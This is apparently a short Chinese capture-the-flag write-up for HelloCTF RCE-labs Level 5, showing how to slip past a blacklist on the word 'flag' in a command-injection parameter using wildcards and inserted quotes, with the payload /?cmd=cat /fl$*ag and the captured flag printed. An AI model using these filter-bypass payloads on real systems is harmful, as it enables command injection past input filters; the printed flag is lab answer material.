HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
杜子不疼.1 天前
Linux】 性能调优实战:内核参数优化技巧
linux·运维·php
岛屿旅人1 天前
英国国防部推进本土化开放架构建设
网络·人工智能·安全·web安全·架构
立早正文1 天前
Docker从零到一部署DNMP+Redis《全程干货》
docker·容器·php
JaguarJack1 天前
PHP 现代特性速查 写出更简洁安全的代码(第一篇)
后端·php
007php0072 天前
某游戏大厂 Java 面试题深度解析(四)
java·开发语言·python·面试·职场和发展·golang·php
介一安全2 天前
【Web安全】泛微OA框架SRC高频漏洞分析总结
web安全·网络安全·安全性测试
骷大人2 天前
php安装skywalking_agent
开发语言·php·skywalking
emma羊羊2 天前
【weblogic】文件上传漏洞
安全·网络安全·靶场·weblogic
jenchoi4132 天前
【2025-11-01】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
移远通信2 天前
常见问题解答
开发语言·php